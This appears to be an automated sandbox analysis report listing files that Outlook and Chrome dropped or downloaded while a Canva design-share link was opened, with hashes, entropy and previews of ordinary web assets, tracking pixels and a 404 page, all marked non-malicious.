                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,......\.d.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.p....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y+p....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y+p....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y+p...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y,p...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i........... J.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Microsoft Outlook email folder (>=2003)
                                                                Category:dropped
                                                                Size (bytes):271360
                                                                Entropy (8bit):1.3301988921323824
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B11696BA994512B61DDB7821E8318134
                                                                SHA1:504E65C16CE2FBE82348A3B9ED4DFF30CBA652F1
                                                                SHA-256:39E7E9D5E5674CD98CD130B676B76D753BD43A0BC6644985B48E82340E2ABE72
                                                                SHA-512:9DBBBCD618D9C9D0F910400432410DD0ED0B34E42A18A47D30F6FEA404EFC830377EB190C679728C5B727C695741925C6EE3FD232403B43BDB930AF201F225DE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!BDN.0..SM......\......................U................@...........@...@...................................@...........................................................................$.......D.......M..........................................................................................................................................................................................................................................................................................................................<.......SIE}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):131072
                                                                Entropy (8bit):1.2077208909254642
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:730647F74249DACEF090933959A90AB1
                                                                SHA1:B6A6C9276E81CF3223C9EC7374D3E52E221AF3F8
                                                                SHA-256:9BB2B69ABF0DAEF4838230D10DE88FEC7F9EF6C6F58E06B01062AD2998DE2D80
                                                                SHA-512:52D18B042CB467DA6048D1B5EA628F2E29843C0F4ABC940691AD3EBE281F3539E85AD908441FB77A163C5FAEF8D7D0C3D6D3D015231C9D7613B1D7E5484D0FD5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:v..80...[.......|.....x.d........D............#...........?.................................................................?........................................................................................................................................................................................................................................................................................................................................................................................................................................d6..D......d...0...\.......|.....x.d........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (477)
                                                                Category:downloaded
                                                                Size (bytes):540
                                                                Entropy (8bit):5.505827725159305
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:018618756DD2613FABF85C7F6C03096F
                                                                SHA1:36026C05CD9F661D87D3FC3D558EF5DA15FB7881
                                                                SHA-256:F028647EAB1CD92BEDBC5CB03579D564CEF41C9BF6EC314C77C351BAF551079A
                                                                SHA-512:0E97FA56F620606343B9C96BAC1A5D3B80AB2A8644ECAFC3D92020FE73FA1798FBEE6FBBDAC6E324894B7E62D145B9C8703615B53F7F7D0C4FE0D4CF2774042D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/5677e6ee55ebdedd.ltr.css
                                                                Preview:._4C1vIA>.YL_ApQ,._4C1vIA>.qqCHKg{transition:opacity .3s ease-in-out}.gWeP3g,.qqCHKg{opacity:0}.YL_ApQ{opacity:1}.pOll6Q>.gum40Q{display:none}.g1T5pQ>.gum40Q{visibility:hidden}.epgNPA{width:100%}.NvaaRg{overflow:hidden}.epgNPA._3pVd7A{display:flex}.KhPLRA{display:grid;grid-template-areas:"content";grid-template-columns:1fr;grid-template-rows:1fr;position:relative}.DiwaPA,.DiwaPA>.KhPLRA{height:100%;max-height:100%}._3pVd7A,._3pVd7A>.KhPLRA{flex:1}.T3uz5Q{grid-area:content}./*# sourceMappingURL=sourcemaps/5677e6ee55ebdedd.ltr.css.map*/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                Category:downloaded
                                                                Size (bytes):42
                                                                Entropy (8bit):2.9881439641616536
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://adservice.google.com/ddm/fls/z/src=9812343;type=conve0;cat=canva008;ord=39425697;gtm=45j91e48l0v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;ps=1;pcor=37337338;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor
                                                                Preview:GIF89a.............!.......,...........D.;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (4765)
                                                                Category:downloaded
                                                                Size (bytes):217401
                                                                Entropy (8bit):5.746596182697426
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:505E7D304434D449AF7B81D45336E032
                                                                SHA1:F2265D66FE416CEB5C5015ACAF4C0C87518A54BE
                                                                SHA-256:7C109040D44461E58A1AC8D02ECB38885CBE79427516618CDCA48264ED6A3F3B
                                                                SHA-512:82A0FE63C115D38D350E0B5C42962ECC92AAFCF6CCC371B72AE02DC708963AC04B524151FC4B87CACD858B8067F25B7A26FDD15346C43835BD6A3EAFB83CEDFD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://chunk-composing.canva.com/chunk-batch/7497bf481ea2adf1.js+364c04437cf14ff8.js+19efe4a612083a93.js+0d88565c28c62193.js+bfe04665998fe726.strings.js+2debf5e61dfea8d1.js+dad3364637d681fb.strings.js+68d49ab162f83514.js
                                                                Preview:;// __FILE_CONTENT_FOR__:7497bf481ea2adf1.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3790],{../***/ 228043:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(703852);__web_req__(767361);__web_req__(169439);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var nr=__c.nr;var pr=__c.pr;var AQb=__c.Za(()=>({mode:[6,__c.LNa,7,__c.KNa]}),__c.by);var BQb=__c.K(()=>({Zb:__c.P("phoneNumber",1),ac:__c.Q("countryCode",2)}));var CQb=__c.K(()=>Object.assign({},__c.Nx(),{mode:__c.D("A?",5,"EMAIL_LINK"),email:__c.P(11)}));var DQb=__c.Za(()=>({mode:[3,__c.mNa,4,__c.Ox,5,CQb]}),__c.Nx);var EQb=__c.K(()=>({email:__c.P(1),Cd:__c.E(2,__c.Lx)}));var MY;.__c.GQb=class{async kN(a,b){const c=b&&b.P&&this.ba&&this.ba.startSpan("getauthenticationoptions.http_client",b.P);b=pr(nr([MY,"authentication","options"]));con
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (18589)
                                                                Category:dropped
                                                                Size (bytes):19026
                                                                Entropy (8bit):5.185706546268017
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:02EF13754DDE4CA6888C2F3EFE0B39E5
                                                                SHA1:E0118B3E9A6F971A6FD7711D4E5C351F8D497EAD
                                                                SHA-256:CAA7C8C866F81F823FF760E8BE7AB4500D4F0C1595B488EE51F9B2955A9CEC9D
                                                                SHA-512:34DFB887E52E1A445232A52329A8A3729AEECD2D007BA09EA26B7A96FE20C1F6D4C24A9E1CB125461418186843F881D9D6D9EE194298B24EDAF1D69B65D4F533
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(function() {. const messages = JSON.parse("{\"in7gzw\":\".{0} . {1}\",\"iGADsg\":\"Skip to search\",\"mYD1Jg\":\"Confirm\",\"08inLQ\":\"Page {0}\",\"nGBlYg\":\"Change email\",\"m0Q+yA\":\"You.re invited to edit a design created by {0}, start designing now\",\"/JYvRA\":\"Set password\",\"DiRXIw\":\"June\",\"XS/GBQ\":\"Untitled\",\"GQHbPg\":\"Reset your password\",\"bSA5qA\":\"To protect your privacy we can.t allow you to create a Canva account yourself.\",\"LE4MeQ\":\"Esc\",\"q4OW6A\":\"Your birthday can.t be in the future\",\"uUdx/g\":\"Because you.re using a company email, we.ll assume this is a work account. Read our <a href=\\\"{0}\\\">Privacy Policy</a> to learn more.\",\"/fLNHg\":\"When you set up two factor authentication we gave you some backup codes. You can use one of them here to regain access to your account.\",\"yAXvfg\":\"Create your own design with Canva\",\"5Tv5LQ\":\"The password reset code is not valid. Please request a new code.\",\"BXjIaA\":\"Perform .
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:CSV text
                                                                Category:downloaded
                                                                Size (bytes):35234
                                                                Entropy (8bit):5.118117952047096
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E09E2E1FC340201F46C6B422BA600D5A
                                                                SHA1:16D401D9A12AD80829C81CD561D51EB392D402E1
                                                                SHA-256:4C0EFBD2527DC14E6F890750AFE5C802AC496AB5F74B681D262975A0035790CF
                                                                SHA-512:F3D7ED9695D32759B396321DBC382EC0D9864B884FFCE9BDD22CC2DACB29284524EE882A748619AE399CFBB6616621A888879F5540A6DF465C8F18B6D34841F5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://font-public.canva.com/_fb/s/41d36c36b634199c0ebf5e807fda38d0.css
                                                                Preview:@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format("woff"), url(https://font-public.canva.com/_fb/0/05.ttf) format("truetype")}..@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 700; font-style: normal; src: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("woff"), url(https://font-public.canva.com/_fb/0/02.ttf) format("truetype")}..@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: italic; src: url(https://font-public.canva.com/_fb/0/04.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/04.woff) format("woff"), url(https://font-public.canva.com/_fb/0/04.ttf) format("truetype")}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                Category:downloaded
                                                                Size (bytes):1249
                                                                Entropy (8bit):5.242453121762845
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F58515DFE987F7E027C8A71BBC884621
                                                                SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                                                SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                                                SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://logicvortexe.pl/favicon.ico
                                                                Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:downloaded
                                                                Size (bytes):170
                                                                Entropy (8bit):5.635935684339176
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C6F5082A3B70BDE830FB5FAB01C3CAE8
                                                                SHA1:92CAE3FE0D7C6C0A597637C1615F6CD72831607F
                                                                SHA-256:D95F06F6A688C6BD075282B98F0DD10D3C92F5C566E4B19E04BDF5C85E3EF31D
                                                                SHA-512:FDB1F6C750355778FA713E15D2EEEFCD1523BB5CC2D3C851E06EBA55818F6C2786EDC38E1BFAC076FA45919FECDFD7BAA559499A0470C24A8D3BDD0F0DB53717
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/df587b55a0168cd1.ltr.css
                                                                Preview:./*# sourceMappingURL=data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IiIsImZpbGUiOiIxNWJmNzM3NDE2NzlmOTk1Lmx0ci5jc3MifQ== */
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2135)
                                                                Category:downloaded
                                                                Size (bytes):5693
                                                                Entropy (8bit):5.6613363486231325
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6DDAFDDE71AA31D3761A086790FF1AF9
                                                                SHA1:35DCB6B15D1EAF2B56275D91BCB201EC8E6BD591
                                                                SHA-256:2067013FB64EEDF1E7A129CEB41AC00DAC0CF6C43BAC7F4EAF5EF3EB8F32B347
                                                                SHA-512:63E7AA9741858083C2FDA3355711487F9651CF9F58C126CF429C6DDDD91DACE3C206DBE7BDDE501956BF634ABE761ABE94238BE01B938C068D967CA8B0A55D7F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/f17ebe21439a211e.js
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[59],{../***/ 695547:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(391214);__web_req__(237221);__web_req__(642158);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var vu,qHa,rHa,yu,sHa,Au,Bu,uHa;vu=function(a,b){const c=Math.floor(b/32);b=1<<b%32;return c<a.length&&(a[c]&b)===b};__c.wu=function(a){const b=vu(a,0),c=vu(a,1),d=vu(a,2);return{vI:b,performance:c,FG:d,oW:vu(a,3),mbb:vu(a,10),bbb:vu(a,11),ibb:vu(a,12),kbb:vu(a,13),jbb:vu(a,14),lbb:vu(a,15),ebb:vu(a,44),gbb:vu(a,45),cbb:vu(a,46),dbb:vu(a,47),fbb:vu(a,48),UJa:vu(a,50),hbb:vu(a,51),kB:vu(a,4)||d,pPa:vu(a,5)||b,cKa:vu(a,6)||d,J$a:vu(a,7)||c,aRb:vu(a,36)||c}};.__c.xu=function(a,b,c={}){const d=c.lha,e=c.Qma,f="function"===typeof b?b:()=>b,g=new oHa,h=new __c.pHa;let k=!1,l,m;c=new Promise(
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 8 x 15, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.035372245524405
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C17CFF0064225FEA35483858724B547C
                                                                SHA1:3914BD6D658A96D3CEC9364BCDC2CF73412C897A
                                                                SHA-256:50250B81A0A8FCFDBB5A5FDDCB96CF15F4418194DE2742225DD7A18AD433838F
                                                                SHA-512:F38F4C59915E7FD65F99430CD4303EDC46E5F447EC5AE8A39C4AD18B440A3F63F7EF73057589831F90132278776553CCBC95C2963DE8D7C806C2033A9881AE87
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.............Vh.d....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10099)
                                                                Category:downloaded
                                                                Size (bytes):10359
                                                                Entropy (8bit):4.826967222214678
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4EB0CC037AA215C5FA2EB3C1B342613D
                                                                SHA1:97D135C19209077C0335065F35D53FFFC62CAA88
                                                                SHA-256:E8FB139770EC251E750403322D40DB96C027B9FEB48F4489B76A735F9F0869E5
                                                                SHA-512:270302A621DD93DE4CA144DAB5F699270B2DCDE0E759FBD63098B09D2C597CF9A07827B8CAF40343E38D3108C8CBF1EDEF6AF44E6944FA0BD99D8467A5D2DD56
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/a0684b0780c739e9.vendor.ltr.css
                                                                Preview:/*!. * Quill Editor v2.0.0-dev.46. * https://quilljs.com/. * Copyright (c) 2014, Jason Chen. * Copyright (c) 2013, salesforce.com. */.ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:relative}.ql-container.ql-disabled .ql-tooltip{visibility:hidden}.ql-container:not(.ql-disabled) li[data-list=checked]>.ql-ui,.ql-container:not(.ql-disabled) li[data-list=unchecked]>.ql-ui{cursor:pointer}.ql-clipboard{height:1px;left:-100000px;overflow-y:hidden;position:absolute;top:50%}.ql-clipboard p{margin:0;padding:0}.ql-editor{word-wrap:break-word;box-sizing:border-box;counter-reset:list-0 list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;height:100%;line-height:1.42;outline:none;overflow-y:auto;padding:12px 15px;tab-size:4;-moz-tab-size:4;text-align:left;white-space:pre-wrap}.ql-editor>*{cursor:text}.ql-editor blockquote,.ql-editor h1,.ql-editor h2,.ql-editor h3,.ql-editor h4,.ql-editor h5,.ql-editor h6,.ql-editor ol,.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):354
                                                                Entropy (8bit):5.6762578005096325
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B4F9F0DD587C5ABE6708F44A6E11A53F
                                                                SHA1:28EBFA68F92AE2A96354521FFAD38A3DBE647154
                                                                SHA-256:CCC37C837397D66FD8E0FACFE001CE7FC9F87E48089D73540AD2C2DD95716D04
                                                                SHA-512:D471D889D8EAE3E9190B39376C29400D5AB9BF3C47897B64DC278E4E58314A78F148A44BB315D51591CA5384EAE505AD411BEF7AA706FDD5678023109A809425
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cdn.metadata.io/pixel/config/1721.json
                                                                Preview:{"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNrYWdlIjoiRlVMTF9GVU5DVElPTkFMSVRZIiwiaXNfcGxnIjoiMCJ9.wMldEMSftyWmTu8VELd7xI0gDpqzWR64-SlbjetKBO8"}.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2744)
                                                                Category:downloaded
                                                                Size (bytes):231991
                                                                Entropy (8bit):5.5523753452642195
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AEC864050091ECC65AB8425EB6E4DF5C
                                                                SHA1:9554C411BE2EC274C62E733348850669BD0A4F93
                                                                SHA-256:88CE39D161AE5B1386B558577D6F75B7DF8A3902D0077054BF2D0E8503ACC0DD
                                                                SHA-512:5363D6E7C6D6ADAD497A45C58593E9C82B5C790539296B7D280BD2E5D599F6CB6367EFC3CCE633C821B143C7E77EBE1D18B8AAF9218EF650C86B05748F0049B7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://accounts.google.com/gsi/client
                                                                Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2440000, 0x1c07, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                Category:downloaded
                                                                Size (bytes):43
                                                                Entropy (8bit):3.0314906788435274
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:325472601571F31E1BF00674C368D335
                                                                SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://sb.scorecardresearch.com/p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1061915155
                                                                Preview:GIF89a.............!.......,...........D..;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (840)
                                                                Category:downloaded
                                                                Size (bytes):1729
                                                                Entropy (8bit):5.441222802992031
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7FFC1511B42C0BAA3F375F86BB8592D1
                                                                SHA1:D0060E4D0D84B5B5A4CB2BEA3EB682F48F94BE93
                                                                SHA-256:54C010ED9F074582C3ABAF5AE0D24BABF15D584C36046891B5219065B2A1BC0B
                                                                SHA-512:3C8BBA28919A4B470063DB4AB4538605E1F33C503CBF4DD43E0E9545BDE3081458E831DABCF05027BF759D78D73DD18733613C7DC99B479358E25CB43A1801B8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ct.canva.com/g/collect?v=2&tid=G-EPWEMH6717&gtm=45je48l0v872399471z8812729902za200zb812729902&_p=1724421764514&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=0&cid=650264388.1724421767&ecid=463242634&ul=en-us&sr=1280x1024&_fplc=0&ur=US-NJ&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1724421764514&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1724421767&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20278&ep.event_id=1724422386102_172442270395855&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=loaded&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=a%20page&ep.custom_doctype_id=TACQ-gtv2Yk&ep.custom_product_variant=web-2&ep.custom_country_code=US&up.custom_country_code=US&tfd=11177&richsstsse
                                                                Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=499910485;gtm=45j91e48l0v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;ps=1;pcor=332234562;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=websi000;cat=flood0;ord=499910485;gtm=45j91e48l0v8723
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (23802)
                                                                Category:dropped
                                                                Size (bytes):23865
                                                                Entropy (8bit):5.320045978672829
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:75FAADEB796552579E43124F83871940
                                                                SHA1:AF5E942EBC0EBEF0CAE3A33ADDA8AF34B4F3DA64
                                                                SHA-256:0200774B20157E9C816ACD3C5BA2802E4B052D657698C90F7CE3CCD54431C753
                                                                SHA-512:EDDD147AC3D74358CFBD8E1D75436A7158710C09585C85A3113825B567B7B4A6DD476E511CD4FED6A1DF9BBCFF26135B8428B329282F518ADCDDFA8B78C88A7E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[6928],{167824:t=>{"use strict";t.exports=t=>!(!t||t.length<3)&&(255===t[0]&&216===t[1]&&255===t[2])},66209:t=>{"use strict";t.exports=function(t){return!(!t||t.length<8)&&(137===t[0]&&80===t[1]&&78===t[2]&&71===t[3]&&13===t[4]&&10===t[5]&&26===t[6]&&10===t[7])}},797806:(t,e,n)=>{"use strict";n.d(e,{E1:()=>o,Tl:()=>u,Zy:()=>c});var r,i=!("undefined"==typeof window||!window.document||!window.document.createElement);function o(){if(r)return r;if(!i||!window.document.body)return"indeterminate";var t=window.document.createElement("div");return t.appendChild(document.createTextNode("ABCD")),t.dir="rtl",t.style.fontSize="14px",t.style.width="4px",t.style.height="1px",t.style.position="absolute",t.style.top="-1000px",t.style.overflow="scroll",document.body.appendChild(t),r="reverse",t.scrollLeft>0?r="default":(t.scrollLeft=2,t.scrollLeft<2&&(r="negative")),document.body.removeChild(t),r}function u(t,e){var n=t.scrollLeft;if("
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (65311)
                                                                Category:dropped
                                                                Size (bytes):418962
                                                                Entropy (8bit):5.414110424675336
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2D626DBDE51049DF4E8B8FA2EC1F5CBB
                                                                SHA1:BEE57CC83F6BA4F4622ED8284944CD3BBBCEDE12
